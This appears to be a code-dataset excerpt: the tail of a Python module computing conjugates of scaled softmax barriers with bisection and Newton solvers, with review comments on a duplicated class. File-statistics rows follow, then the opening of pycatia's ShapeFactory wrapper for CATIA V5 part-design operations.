        if np.any(np.isnan(orthant_maximizer)):
            raise ValueError('maximizer is nan')
        orthant_val = np.sum(orthant_maximizer * orthant_arg -
                             np.log(1 + (self.barrier_scale / orthant_maximizer)))

        def cube_conjugate_grad(z, u, j):
            # Stationarity condition u = barrier'(z) for coordinate j.
            _diff = z - self.lagrange[j]  # z - \lambda < 0
            _sum = z + self.lagrange[j]  # z + \lambda > 0
            return u - (1. / (_diff - (self.cube_scale * self.lagrange[j])) - 1. / _diff +
                        1. / (_sum + (self.cube_scale * self.lagrange[j])) - 1. / _sum)

        #def cube_conjugate(z, u, j):
        #    return -u * z + cube_barrier_softmax_coord(z, self.lagrange[j])

        cube_maximizer = np.zeros(cube_arg.shape[0])

        #for i in range(cube_arg.shape[0]):
        #    u = cube_arg[i]
        #    j = i
        #    bounds = [(-self.lagrange[i], self.lagrange[i])]
        #    res = minimize(cube_conjugate, x0=(self._initial)[i], args=(u,j), bounds=bounds)
        #    cube_maximizer[i] = res.x

        for i in range(cube_arg.shape[0]):
            u = cube_arg[i]
            j = i
            # Root of the gradient inside the open cube (endpoints nudged in).
            cube_maximizer[i] = bisect(cube_conjugate_grad, a=-self.lagrange[j] + 1e-10,
                                       b=self.lagrange[j] - 1e-10, args=(u, j),
                                       rtol=4.4408920985006262e-5, maxiter=32)
        if np.any(np.isnan(cube_maximizer)):
            raise ValueError('cube maximizer is nan')

        cube_val = np.sum(cube_maximizer * cube_arg - np.log(1. + ((self.cube_scale * self.lagrange)
                                                                   / (self.lagrange - cube_maximizer)))
                          - np.log(1. + ((self.cube_scale * self.lagrange) / (self.lagrange + cube_maximizer))))

        if mode == 'func':
            return cube_val + orthant_val
        elif mode == 'grad':
            g = np.zeros(self.shape)
            g[self.cube_bool] = cube_maximizer
            g[self.orthant_bool] = orthant_maximizer
            return g
        elif mode == 'both':
            g = np.zeros(self.shape)
            g[self.cube_bool] = cube_maximizer
            g[self.orthant_bool] = orthant_maximizer
            return cube_val + orthant_val, g
        else:
            raise ValueError('mode incorrectly specified')
# NOTE(review): this class is an exact duplicate of the
# `barrier_conjugate_softmax_scaled` defined immediately above; this second
# definition shadows the first at import time.  Consider deleting one copy.
class barrier_conjugate_softmax_scaled(rr.smooth_atom):
    r"""
    Conjugate of a scaled softmax barrier for the
    product $[0,\infty)^E \times [-\lambda,\lambda]^{-E}$.
    """
    def __init__(self,
                 cube_bool,  # -E
                 lagrange,  # cube half lengths
                 cube_scale=1.,
                 barrier_scale=1.,  # maybe scale each coordinate in future?
                 coef=1.,
                 offset=None,
                 quadratic=None):
        p = cube_bool.shape[0]
        orthant_bool = ~cube_bool
        initial = np.ones(p)
        # NOTE(review): chained assignment — self._initial holds lagrange * 0.5,
        # not the `initial` array; only the commented-out solver below reads it.
        self._initial = initial[cube_bool] = lagrange * 0.5
        if barrier_scale is None:
            barrier_scale = 1.
        (self.cube_bool,
         self.orthant_bool,
         self.lagrange,
         self.cube_scale,
         self.barrier_scale) = (cube_bool,
                                orthant_bool,
                                lagrange,
                                cube_scale,
                                barrier_scale)
        rr.smooth_atom.__init__(self,
                                (p,),
                                offset=offset,
                                quadratic=quadratic,
                                initial=initial,
                                coef=coef)

    def smooth_objective(self, arg, mode='both', check_feasibility=False, tol=1.e-12):
        """Evaluate conjugate value and/or gradient at `arg` (mode: 'func'/'grad'/'both')."""
        # here we compute those expressions in the note
        arg = self.apply_offset(arg)  # all smooth_objectives should do this....
        cube_arg = arg[self.cube_bool]
        orthant_arg = arg[self.orthant_bool]

        if check_feasibility and np.any(orthant_arg >= -tol):
            raise ValueError('returning nan gradient')
            # NOTE(review): unreachable after the raise — leftover return path.
            if mode == 'func':
                return np.inf
            elif mode == 'grad':
                return np.nan * np.ones(self.shape)
            elif mode == 'both':
                return np.inf, np.nan * np.ones(self.shape)
            else:
                raise ValueError('mode incorrectly specified')

        orthant_maximizer = (- 0.5 * self.barrier_scale) + np.sqrt((0.25 * (self.barrier_scale ** 2)) -
                                                                   (self.barrier_scale / orthant_arg))
        if np.any(np.isnan(orthant_maximizer)):
            raise ValueError('maximizer is nan')
        orthant_val = np.sum(orthant_maximizer * orthant_arg -
                             np.log(1 + (self.barrier_scale / orthant_maximizer)))

        def cube_conjugate_grad(z, u, j):
            # Stationarity condition u = barrier'(z) for coordinate j.
            _diff = z - self.lagrange[j]  # z - \lambda < 0
            _sum = z + self.lagrange[j]  # z + \lambda > 0
            return u - (1. / (_diff - (self.cube_scale * self.lagrange[j])) - 1. / _diff +
                        1. / (_sum + (self.cube_scale * self.lagrange[j])) - 1. / _sum)

        #def cube_conjugate(z, u, j):
        #    return -u * z + cube_barrier_softmax_coord(z, self.lagrange[j])

        cube_maximizer = np.zeros(cube_arg.shape[0])

        #for i in range(cube_arg.shape[0]):
        #    u = cube_arg[i]
        #    j = i
        #    bounds = [(-self.lagrange[i], self.lagrange[i])]
        #    res = minimize(cube_conjugate, x0=(self._initial)[i], args=(u,j), bounds=bounds)
        #    cube_maximizer[i] = res.x

        for i in range(cube_arg.shape[0]):
            u = cube_arg[i]
            j = i
            cube_maximizer[i] = bisect(cube_conjugate_grad, a=-self.lagrange[j] + 1e-10,
                                       b=self.lagrange[j] - 1e-10, args=(u, j),
                                       rtol=4.4408920985006262e-5, maxiter=32)
        if np.any(np.isnan(cube_maximizer)):
            raise ValueError('cube maximizer is nan')

        cube_val = np.sum(cube_maximizer * cube_arg - np.log(1. + ((self.cube_scale * self.lagrange)
                                                                   / (self.lagrange - cube_maximizer)))
                          - np.log(1. + ((self.cube_scale * self.lagrange) / (self.lagrange + cube_maximizer))))

        if mode == 'func':
            return cube_val + orthant_val
        elif mode == 'grad':
            g = np.zeros(self.shape)
            g[self.cube_bool] = cube_maximizer
            g[self.orthant_bool] = orthant_maximizer
            return g
        elif mode == 'both':
            g = np.zeros(self.shape)
            g[self.cube_bool] = cube_maximizer
            g[self.orthant_bool] = orthant_maximizer
            return cube_val + orthant_val, g
        else:
            raise ValueError('mode incorrectly specified')
###########################################################
class linear_map(rr.smooth_atom):
    """
    Linear functional arg -> <dual_arg, arg> wrapped as an rr.smooth_atom,
    so it can be subtracted from barrier objectives.  Its gradient is the
    constant vector `dual_arg`.
    """
    def __init__(self,
                 dual_arg,
                 coef=1.,
                 offset=None,
                 quadratic=None):
        self.dual_arg = dual_arg
        p = self.dual_arg.shape[0]
        rr.smooth_atom.__init__(self,
                                (p,),
                                offset=offset,
                                quadratic=quadratic,
                                coef=coef)

    def smooth_objective(self, arg, mode='both', check_feasibility=False, tol=1.e-6):
        """Return the inner product and/or its (constant) gradient."""
        arg = self.apply_offset(arg)
        if mode == 'func':
            return self.dual_arg.T.dot(arg)
        if mode == 'grad':
            return self.dual_arg
        if mode == 'both':
            return self.dual_arg.T.dot(arg), self.dual_arg
        raise ValueError('mode incorrectly specified')
class barrier_conjugate_softmax_scaled_rr(rr.smooth_atom):
    r"""
    Conjugate of a scaled softmax barrier for the
    product $[0,\infty)^E \times [-\lambda,\lambda]^{-E}$.

    Variant of `barrier_conjugate_softmax_scaled` whose cube part is solved by
    the Newton iteration in `cube_conjugate` (defined later in this module)
    instead of coordinate-wise bisection.
    """
    def __init__(self,
                 cube_bool,  # -E
                 lagrange,  # cube half lengths
                 cube_scale=1.,
                 barrier_scale=1.,  # maybe scale each coordinate in future?
                 coef=1.,
                 offset=None,
                 quadratic=None):
        p = cube_bool.shape[0]
        orthant_bool = ~cube_bool
        initial = np.ones(p)
        # NOTE(review): chained assignment — self._initial holds lagrange * 0.5,
        # not the `initial` array; nothing active reads self._initial.
        self._initial = initial[cube_bool] = lagrange * 0.5
        if barrier_scale is None:
            barrier_scale = 1.
        (self.cube_bool,
         self.orthant_bool,
         self.lagrange,
         self.cube_scale,
         self.barrier_scale) = (cube_bool,
                                orthant_bool,
                                lagrange,
                                cube_scale,
                                barrier_scale)
        rr.smooth_atom.__init__(self,
                                (p,),
                                offset=offset,
                                quadratic=quadratic,
                                initial=initial,
                                coef=coef)

    def smooth_objective(self, arg, mode='both', check_feasibility=False, tol=1.e-12):
        """Evaluate conjugate value and/or gradient at `arg` (mode: 'func'/'grad'/'both')."""
        # here we compute those expressions in the note
        arg = self.apply_offset(arg)  # all smooth_objectives should do this....
        cube_arg = arg[self.cube_bool]
        orthant_arg = arg[self.orthant_bool]

        if check_feasibility and np.any(orthant_arg >= -tol):
            raise ValueError('returning nan gradient')
            # NOTE(review): unreachable after the raise — leftover return path.
            if mode == 'func':
                return np.inf
            elif mode == 'grad':
                return np.nan * np.ones(self.shape)
            elif mode == 'both':
                return np.inf, np.nan * np.ones(self.shape)
            else:
                raise ValueError('mode incorrectly specified')

        orthant_maximizer = (- 0.5 * self.barrier_scale) + np.sqrt((0.25 * (self.barrier_scale ** 2)) -
                                                                   (self.barrier_scale / orthant_arg))
        if np.any(np.isnan(orthant_maximizer)):
            raise ValueError('maximizer is nan')
        orthant_val = np.sum(orthant_maximizer * orthant_arg -
                             np.log(1 + (self.barrier_scale / orthant_maximizer)))

        # cube_conjugate minimizes barrier - <cube_arg, .>, so its value is the
        # negative of the conjugate's cube contribution.
        cube_maximizer, neg_cube_val = cube_conjugate(cube_arg, self.lagrange)
        if np.any(np.isnan(cube_maximizer)):
            raise ValueError('cube maximizer is nan')
        cube_val = -neg_cube_val

        if mode == 'func':
            return cube_val + orthant_val
        elif mode == 'grad':
            g = np.zeros(self.shape)
            g[self.cube_bool] = cube_maximizer
            g[self.orthant_bool] = orthant_maximizer
            return g
        elif mode == 'both':
            g = np.zeros(self.shape)
            g[self.cube_bool] = cube_maximizer
            g[self.orthant_bool] = orthant_maximizer
            return cube_val + orthant_val, g
        else:
            raise ValueError('mode incorrectly specified')
def cube_conjugate(cube_argument,
                   lagrange,
                   nstep=100,
                   initial=None,
                   lipschitz=0,
                   tol=1.e-10):
    """
    Minimize cube_barrier_scaled(z, lagrange) - <cube_argument, z> by a damped
    Newton iteration using the barrier's diagonal Hessian.

    Parameters: `nstep` caps the Newton iterations, `initial` seeds the iterate
    (defaults to lagrange/2, strictly feasible), `lipschitz` is added to the
    Hessian for damping, and `tol` is the relative-decrease stopping criterion.

    Returns (minimizer, objective value at the minimizer).
    """
    k = cube_argument.shape[0]
    if initial is None:
        current = lagrange * 0.5
    else:
        current = initial
    current_value = np.inf
    # Fix: `np.float` was deprecated in NumPy 1.20 and removed in 1.24;
    # the builtin `float` is the equivalent dtype.
    step = np.ones(k, float)
    linear = linear_map(cube_argument)
    objective = lambda z: cube_barrier_scaled(z, lagrange) - linear.smooth_objective(z, 'func')

    for itercount in range(nstep):
        newton_step = ((cube_gradient_scaled(current, lagrange) - cube_argument) /
                       (cube_hessian_scaled(current, lagrange) + lipschitz))

        # make sure proposal is a descent: backtrack by halving the step
        while True:
            proposal = current - step * newton_step
            proposed_value = objective(proposal)
            if proposed_value <= current_value:
                break
            step *= 0.5

        # stop if relative decrease is small
        if np.fabs(current_value - proposed_value) < tol * np.fabs(current_value):
            current = proposal
            current_value = proposed_value
            break

        current = proposal
        current_value = proposed_value
        # Periodically grow the step so backtracking doesn't shrink it forever.
        if itercount % 4 == 0:
            step *= 2

    value = objective(current)
    return current, value
| 35.564179
| 125
| 0.512213
| 2,708
| 23,828
| 4.319055
| 0.065362
| 0.050274
| 0.02565
| 0.021631
| 0.879873
| 0.862517
| 0.840373
| 0.837124
| 0.835585
| 0.835585
| 0
| 0.01902
| 0.375567
| 23,828
| 669
| 126
| 35.617339
| 0.767054
| 0.133121
| 0
| 0.85906
| 0
| 0
| 0.030659
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044743
| false
| 0
| 0.006711
| 0
| 0.158837
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f8b7990c002f266bfc1c7a84c2b0ea916a8932fb
| 156,241
|
py
|
Python
|
pycatia/part_interfaces/shape_factory.py
|
evereux/catia_python
|
08948585899b12587b0415ce3c9191a408b34897
|
[
"MIT"
] | 90
|
2019-02-21T10:05:28.000Z
|
2022-03-19T01:53:41.000Z
|
pycatia/part_interfaces/shape_factory.py
|
Luanee/pycatia
|
ea5eef8178f73de12404561c00baf7a7ca30da59
|
[
"MIT"
] | 99
|
2019-05-21T08:29:12.000Z
|
2022-03-25T09:55:15.000Z
|
pycatia/part_interfaces/shape_factory.py
|
Luanee/pycatia
|
ea5eef8178f73de12404561c00baf7a7ca30da59
|
[
"MIT"
] | 26
|
2019-04-04T06:31:36.000Z
|
2022-03-30T07:24:47.000Z
|
#! usr/bin/python3.6
"""
Module initially auto generated using V5Automation files from CATIA V5 R28 on 2020-06-11 12:40:47.360445
.. warning::
The notes denoted "CAA V5 Visual Basic Help" are to be used as reference only.
They are there as a guide as to how the visual basic / catscript functions work
and thus help debugging in pycatia.
"""
from pycatia.mec_mod_interfaces.body import Body
from pycatia.mec_mod_interfaces.factory import Factory
from pycatia.part_interfaces.add import Add
from pycatia.part_interfaces.assemble import Assemble
from pycatia.part_interfaces.auto_draft import AutoDraft
from pycatia.part_interfaces.auto_fillet import AutoFillet
from pycatia.part_interfaces.chamfer import Chamfer
from pycatia.part_interfaces.circ_pattern import CircPattern
from pycatia.part_interfaces.close_surface import CloseSurface
from pycatia.part_interfaces.const_rad_edge_fillet import ConstRadEdgeFillet
from pycatia.part_interfaces.defeaturing import Defeaturing
from pycatia.part_interfaces.draft import Draft
from pycatia.part_interfaces.face_fillet import FaceFillet
from pycatia.part_interfaces.groove import Groove
from pycatia.part_interfaces.hole import Hole
from pycatia.part_interfaces.intersect import Intersect
from pycatia.part_interfaces.mirror import Mirror
from pycatia.part_interfaces.pad import Pad
from pycatia.part_interfaces.pocket import Pocket
from pycatia.part_interfaces.rect_pattern import RectPattern
from pycatia.part_interfaces.remove import Remove
from pycatia.part_interfaces.remove_face import RemoveFace
from pycatia.part_interfaces.replace_face import ReplaceFace
from pycatia.part_interfaces.rib import Rib
from pycatia.part_interfaces.scaling import Scaling
from pycatia.part_interfaces.sew_surface import SewSurface
from pycatia.part_interfaces.shaft import Shaft
from pycatia.part_interfaces.shell import Shell
from pycatia.part_interfaces.slot import Slot
from pycatia.part_interfaces.solid_combine import SolidCombine
from pycatia.part_interfaces.split import Split
from pycatia.part_interfaces.stiffener import Stiffener
from pycatia.part_interfaces.thick_surface import ThickSurface
from pycatia.part_interfaces.thickness import Thickness
from pycatia.part_interfaces.thread import Thread
from pycatia.part_interfaces.trim import Trim
from pycatia.part_interfaces.tritangent_fillet import TritangentFillet
from pycatia.part_interfaces.user_pattern import UserPattern
from pycatia.part_interfaces.var_rad_edge_fillet import VarRadEdgeFillet
from pycatia.sketcher_interfaces.sketch import Sketch
from pycatia.system_interfaces.any_object import AnyObject
from pycatia.in_interfaces.reference import Reference
class ShapeFactory(Factory):
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384)
| System.IUnknown
| System.IDispatch
| System.CATBaseUnknown
| System.CATBaseDispatch
| System.AnyObject
| MecModInterfaces.Factory
| ShapeFactory
|
| Represents the factory for shapes to create all kinds of shapes that may be
| needed for part design.
|
| The ShapeFactory mission is to build from scratch shapes that will be used
| within the design process of parts. Those shapes have a strong mechanical
| built-in knowledge, such as chamfer or hole, and in most cases apply
| contextually to the part being designed. When created, they become part of the
| definition of whichever body or shape that is current at that time. After they
| are created, they become in turn the current body or shape. In most cases,
| shapes are created from a factory with a minimum number of parameters. Other
| shapes parameters may be set further on by using methods offered by the shape
| itself.
"""
def __init__(self, com_object):
super().__init__(com_object)
self.shape_factory = com_object
def add_new_add(self, i_body_to_add: Body) -> Add:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewAdd(Body iBodyToAdd) As Add
|
| Creates and returns a new add operation within the current
| body.
|
| Parameters:
|
| iBodyToAdd
| The body to add to the current body
|
| Returns:
| The created add operation
:param Body i_body_to_add:
:return: Add
:rtype: Add
"""
return Add(self.shape_factory.AddNewAdd(i_body_to_add.com_object))
def add_new_affinity2(self, x_ratio: float, y_ratio: float, z_ratio: float) -> AnyObject:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewAffinity2(double XRatio,
| double YRatio,
| double ZRatio) As AnyObject
|
| Creates and returns a Affinity feature.
|
| Parameters:
|
| XRatio
| Value for the XRatio.
| YRatio
| Value for the YRatio.
| ZRatio
| Value for the ZRatio.
|
| Returns:
| the created Affinity feature.
:param float x_ratio:
:param float y_ratio:
:param float z_ratio:
:return: AnyObject
:rtype: AnyObject
"""
return AnyObject(self.shape_factory.AddNewAffinity2(x_ratio, y_ratio, z_ratio))
def add_new_assemble(self, i_body_to_assemble: Body) -> Assemble:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewAssemble(Body iBodyToAssemble) As Assemble
|
| Creates and returns a new assembly operation within the current
| body.
|
| Parameters:
|
| iBodyToAssemble
| The body to assemble with the current body
|
| Returns:
| The created assembly operation
:param Body i_body_to_assemble:
:return: Assemble
:rtype: Assemble
"""
return Assemble(self.shape_factory.AddNewAssemble(i_body_to_assemble.com_object))
def add_new_auto_draft(self, i_draft_angle: float) -> AutoDraft:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewAutoDraft(double iDraftAngle) As AutoDraft
|
| Creates and returns a new solid autodraft.
| Use this method to create autodraft by providing draft
| angle.
|
| Parameters:
|
| iDraftAngle
| The draft angle.
|
| Returns:
| The created autodraft.
:param float i_draft_angle:
:return: AutoDraft
:rtype: AutoDraft
"""
return AutoDraft(self.shape_factory.AddNewAutoDraft(i_draft_angle))
def add_new_auto_fillet(self, i_fillet_radius: float, i_round_radius: float) -> AutoFillet:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewAutoFillet(double iFilletRadius,
| double iRoundRadius) As AutoFillet
|
| Creates and returns a new solid autofillet.
| Use this method to create autofillet by providing fillet and round radius
| values.
|
| Parameters:
|
| iFilletRadius
| The fillet radius
| iRoundRadius
| The round radius
|
| Returns:
| The created autofillet
:param float i_fillet_radius:
:param float i_round_radius:
:return: AutoFillet
:rtype: AutoFillet
"""
return AutoFillet(self.shape_factory.AddNewAutoFillet(i_fillet_radius, i_round_radius))
def add_new_axis_to_axis2(self, i_reference: Reference, i_target: Reference) -> AnyObject:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewAxisToAxis2(Reference iReference,
| Reference iTarget) As AnyObject
|
| Creates and returns an AxisToAxis transformation feature.
|
| Parameters:
|
| iReference
| The reference axis.
| iTarget
| The target axis.
|
| Returns:
| The created AxisToAxis transformation feature.
:param Reference i_reference:
:param Reference i_target:
:return: AnyObject
:rtype: AnyObject
"""
return AnyObject(self.shape_factory.AddNewAxisToAxis2(i_reference.com_object, i_target.com_object))
def add_new_blend(self) -> AnyObject:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewBlend() As AnyObject
|
| Creates and returns a new Blend feature.
|
| Returns:
| The created Blend feature
:return: AnyObject
:rtype: AnyObject
"""
return AnyObject(self.shape_factory.AddNewBlend())
def add_new_chamfer(self, i_object_to_chamfer: Reference, i_propagation: int, i_mode: int, i_orientation: int,
i_length1: float, i_length2_or_angle: float) -> Chamfer:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewChamfer(Reference iObjectToChamfer,
| CatChamferPropagation iPropagation,
| CatChamferMode iMode,
| CatChamferOrientation iOrientation,
| double iLength1,
| double iLength2OrAngle) As Chamfer
|
| Creates and returns a new chamfer within the current body.
|
| Parameters:
|
| iObjectToChamfer
| The first edge or face to chamfer
| The following
|
| Boundary object is supported: TriDimFeatEdge.
| iPropagation
| Controls if and how the chamfering operation should propagate beyond
| the first chamfer element iObjectToChamfer, when it is an edge
|
| iMode
| Controls if the chamfer is defined by two lengthes, or by an angle and
| a length
| The value of this argument changes the way the arguments iLength1 and
| iLength2OrAngle should be interpreted.
| iOrientation
| Defines the relative meaning of arguments iLength1 and iLength2OrAngle
| when defining a chamfer by two lengthes
| iLength1
| The first value for chamfer dimensioning. It represents the chamfer
| first length if the chamfer is defined by two lengthes, or the chamfer length
| if the chamfer is defined by a length and an angle.
| iLength2OrAngle
| The second value for chamfer dimensioning. It represents the chamfer
| second length if the chamfer is defined by two lengthes, or the chamfer angle
| if the chamfer is defined by a length and an angle.
| Returns:
| The created chamfer
:param Reference i_object_to_chamfer:
:param int i_propagation:
:param int i_mode:
:param int i_orientation:
:param float i_length1:
:param float i_length2_or_angle:
:return: Chamfer
:rtype: Chamfer
"""
return Chamfer(
self.shape_factory.AddNewChamfer(i_object_to_chamfer.com_object, i_propagation, i_mode, i_orientation,
i_length1, i_length2_or_angle))
def add_new_circ_pattern(self, i_shape_to_copy: AnyObject, i_nb_of_copies_in_radial_dir: int,
i_nb_of_copies_in_angular_dir: int, i_step_in_radial_dir: float,
i_step_in_angular_dir: float, i_shape_to_copy_position_along_radial_dir: int,
i_shape_to_copy_position_along_angular_dir: int, i_rotation_center: Reference,
i_rotation_axis: Reference, i_is_reversed_rotation_axis: bool, i_rotation_angle: float,
i_is_radius_aligned: bool) -> CircPattern:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewCircPattern(AnyObject iShapeToCopy,
| long iNbOfCopiesInRadialDir,
| long iNbOfCopiesInAngularDir,
| double iStepInRadialDir,
| double iStepInAngularDir,
| long iShapeToCopyPositionAlongRadialDir,
| long iShapeToCopyPositionAlongAngularDir,
| Reference iRotationCenter,
| Reference iRotationAxis,
| boolean iIsReversedRotationAxis,
| double iRotationAngle,
| boolean iIsRadiusAligned) As CircPattern
|
| Creates and returns a new circular pattern within the current
| body.
|
| Parameters:
|
| iShapeToCopy
| The shape to be copied by the circular pattern
| iNbOfInstancesInRadialDir
| The number of times iShapeToCopy will be copied along pattern
| radial direction
| iNbOfInstancesInAngularDir
| The number of times iShapeToCopy will be copied along pattern
| angular direction
| iStepInRadialDir
| The distance that will separate two consecutive copies in the
| pattern along its radial direction
| iStepInAngularDir
| The angle that will separate two consecutive copies in the pattern
| along its angular direction
| iShapeToCopyPositionAlongRadialDir
| Specifies the position of the original shape iShapeToCopy among its
| copies along the radial direction
| iShapeToCopyPositionAlongAngularDir
| Specifies the position of the original shape iShapeToCopy among its
| copies along the angular direction
| iRotationCenter
| The point or vertex that specifies the pattern center of rotation
|
| iRotationAxis
| The line or linear edge that specifies the axis around which
| instances will be rotated relative to each other
| The following
|
| Boundary objects are supported: PlanarFace , CylindricalFace ,
| RectilinearTriDimFeatEdge and RectilinearBiDimFeatEdge.
|
| iIsReversedRotationAxis
| The boolean flag indicating wether the natural orientation of
| iRotationAxis should be used to orient the pattern operation. A value of true
| indicates that iItemToDuplicate are copied in the direction of the natural
| orientation of iRotationAxis.
| iRotationAngle
| The angle applied to the direction iRotationAxis prior to applying the
| pattern. The original shape iShapeToCopy is used as the rotation center.
| Nevertheless, the copied shapes themselves are not rotated. This allows the
| definition of a circular pattern relatively to existing geometry, but not
| necessarily parallel to it.
| iIsRadiusAligned
| The boolean flag that specifies whether the instances of
| iItemToDuplicate copied by the pattern should be kept parallel to each other
| (True) or if they should be aligned with the radial direction they lie upon
| (False).
| Returns:
| The created circular pattern
:param AnyObject i_shape_to_copy:
:param int i_nb_of_copies_in_radial_dir:
:param int i_nb_of_copies_in_angular_dir:
:param float i_step_in_radial_dir:
:param float i_step_in_angular_dir:
:param int i_shape_to_copy_position_along_radial_dir:
:param int i_shape_to_copy_position_along_angular_dir:
:param Reference i_rotation_center:
:param Reference i_rotation_axis:
:param bool i_is_reversed_rotation_axis:
:param float i_rotation_angle:
:param bool i_is_radius_aligned:
:return: CircPattern
:rtype: CircPattern
"""
return CircPattern(
self.shape_factory.AddNewCircPattern(i_shape_to_copy.com_object, i_nb_of_copies_in_radial_dir,
i_nb_of_copies_in_angular_dir, i_step_in_radial_dir,
i_step_in_angular_dir, i_shape_to_copy_position_along_radial_dir,
i_shape_to_copy_position_along_angular_dir,
i_rotation_center.com_object, i_rotation_axis.com_object,
i_is_reversed_rotation_axis, i_rotation_angle, i_is_radius_aligned))
def add_new_circ_patternof_list(self, i_shape_to_copy: AnyObject, i_nb_of_copies_in_radial_dir: int,
i_nb_of_copies_in_angular_dir: int, i_step_in_radial_dir: float,
i_step_in_angular_dir: float, i_shape_to_copy_position_along_radial_dir: int,
i_shape_to_copy_position_along_angular_dir: int, i_rotation_center: Reference,
i_rotation_axis: Reference, i_is_reversed_rotation_axis: bool,
i_rotation_angle: float, i_is_radius_aligned: bool) -> CircPattern:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewCircPatternofList(AnyObject iShapeToCopy,
| long iNbOfCopiesInRadialDir,
| long iNbOfCopiesInAngularDir,
| double iStepInRadialDir,
| double iStepInAngularDir,
| long iShapeToCopyPositionAlongRadialDir,
| long iShapeToCopyPositionAlongAngularDir,
| Reference iRotationCenter,
| Reference iRotationAxis,
| boolean iIsReversedRotationAxis,
| double iRotationAngle,
| boolean iIsRadiusAligned) As CircPattern
|
| V5R8 Only: Creates and returns a new circular pattern within the current
| body using a list of shapes.
|
| Parameters:
|
| iShapeToCopy
| The shape to be copied by the circular pattern. Others shapes will
| be add by put_ItemToCopy with CATIAPattern interface
|
| iNbOfInstancesInRadialDir
| The number of times iShapeToCopy will be copied along pattern
| radial direction
| iNbOfInstancesInAngularDir
| The number of times iShapeToCopy will be copied along pattern
| angular direction
| iStepInRadialDir
| The distance that will separate two consecutive copies in the
| pattern along its radial direction
| iStepInAngularDir
| The angle that will separate two consecutive copies in the pattern
| along its angular direction
| iShapeToCopyPositionAlongRadialDir
| Specifies the position of the original shape iShapeToCopy among its
| copies along the radial direction
| iShapeToCopyPositionAlongAngularDir
| Specifies the position of the original shape iShapeToCopy among its
| copies along the angular direction
| iRotationCenter
| The point or vertex that specifies the pattern center of rotation
|
| iRotationAxis
| The line or linear edge that specifies the axis around which
| instances will be rotated relative to each other
| iIsReversedRotationAxis
| The boolean flag indicating wether the natural orientation of
| iRotationAxis should be used to orient the pattern operation. A value of true
| indicates that iItemToDuplicate are copied in the direction of the natural
| orientation of iRotationAxis.
| iRotationAngle
| The angle applied to the direction iRotationAxis prior to applying
| the pattern. The original shape iShapeToCopy is used as the rotation center.
| Nevertheless, the copied shapes themselves are not rotated. This allows the
| definition of a circular pattern relatively to existing geometry, but not
| necessarily parallel to it.
| iIsRadiusAligned
| The boolean flag that specifies whether the instances of
| iItemToDuplicate copied by the pattern should be kept parallel to each other
| (True) or if they should be aligned with the radial direction they lie upon
| (False).
|
| Returns:
| The created circular pattern
:param AnyObject i_shape_to_copy:
:param int i_nb_of_copies_in_radial_dir:
:param int i_nb_of_copies_in_angular_dir:
:param float i_step_in_radial_dir:
:param float i_step_in_angular_dir:
:param int i_shape_to_copy_position_along_radial_dir:
:param int i_shape_to_copy_position_along_angular_dir:
:param Reference i_rotation_center:
:param Reference i_rotation_axis:
:param bool i_is_reversed_rotation_axis:
:param float i_rotation_angle:
:param bool i_is_radius_aligned:
:return: CircPattern
:rtype: CircPattern
"""
return CircPattern(
self.shape_factory.AddNewCircPatternofList(i_shape_to_copy.com_object, i_nb_of_copies_in_radial_dir,
i_nb_of_copies_in_angular_dir, i_step_in_radial_dir,
i_step_in_angular_dir, i_shape_to_copy_position_along_radial_dir,
i_shape_to_copy_position_along_angular_dir,
i_rotation_center.com_object, i_rotation_axis.com_object,
i_is_reversed_rotation_axis, i_rotation_angle,
i_is_radius_aligned))
def add_new_close_surface(self, i_close_element: Reference) -> CloseSurface:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewCloseSurface(Reference iCloseElement) As
| CloseSurface
|
| Creates and returns a new CloseSurface feature.
|
| Parameters:
|
| iCloseElement
| The skin that will be closed and add with the current body
|
|
| Returns:
| The created CloseSurface feature
:param Reference i_close_element:
:return: CloseSurface
:rtype: CloseSurface
"""
return CloseSurface(self.shape_factory.AddNewCloseSurface(i_close_element.com_object))
def add_new_defeaturing(self) -> Defeaturing:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewDefeaturing() As Defeaturing
|
| Creates and returns a new defeaturing operation within the current
| container.
|
| Returns:
| The created defeaturing operation
:return: Defeaturing
:rtype: Defeaturing
"""
return Defeaturing(self.shape_factory.AddNewDefeaturing())
def add_new_draft(self, i_face_to_draft: Reference, i_neutral: Reference, i_neutral_mode: int, i_parting: Reference,
i_dir_x: float, i_dir_y: float, i_dir_z: float, i_mode: int, i_angle: float,
i_multiselection_mode: int) -> Draft:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewDraft(Reference iFaceToDraft,
| Reference iNeutral,
| CatDraftNeutralPropagationMode iNeutralMode,
| Reference iParting,
| double iDirX,
| double iDirY,
| double iDirZ,
| CatDraftMode iMode,
| double iAngle,
| CatDraftMultiselectionMode iMultiselectionMode) As Draft
|
| Creates and returns a new draft within the current body.
| The draft needs a reference face on the body. This face will remain
